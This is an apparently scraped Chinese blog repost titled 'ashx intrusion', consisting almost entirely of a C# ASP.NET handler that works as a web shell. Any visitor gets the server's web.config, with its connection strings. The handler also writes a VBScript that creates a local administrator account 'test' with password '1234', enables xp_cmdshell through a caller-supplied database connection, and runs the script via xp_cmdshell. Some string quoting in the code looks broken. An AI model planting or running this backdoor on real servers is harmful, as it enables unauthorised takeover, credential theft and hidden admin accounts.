zoukankan      html  css  js  c++  java

  • ashx入侵

    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    public class TextLd : IHttpHandler
    {
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    con.Close();
    }
    }
    }
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    case "1": WriteVbs(context); break;
    case "2":
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell
    break;
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    default:
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }
  • 相关阅读:
    解决Windows Server2008 R2中IE开网页时弹出阻止框
    为Java说句公道话
    垃圾回收(GC)的三种基本方式
    偏执却管用的10条Java编程技巧
    学习Javascript的8张思维导图【收藏】
    Java 常见异常及趣味解释
    Java程序员们最常犯的3个集合错误
    浅谈jsp、freemarker、velocity区别
    ThreadLocal使用
    javascript 之闭包
  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html
Copyright © 2011-2022 走看看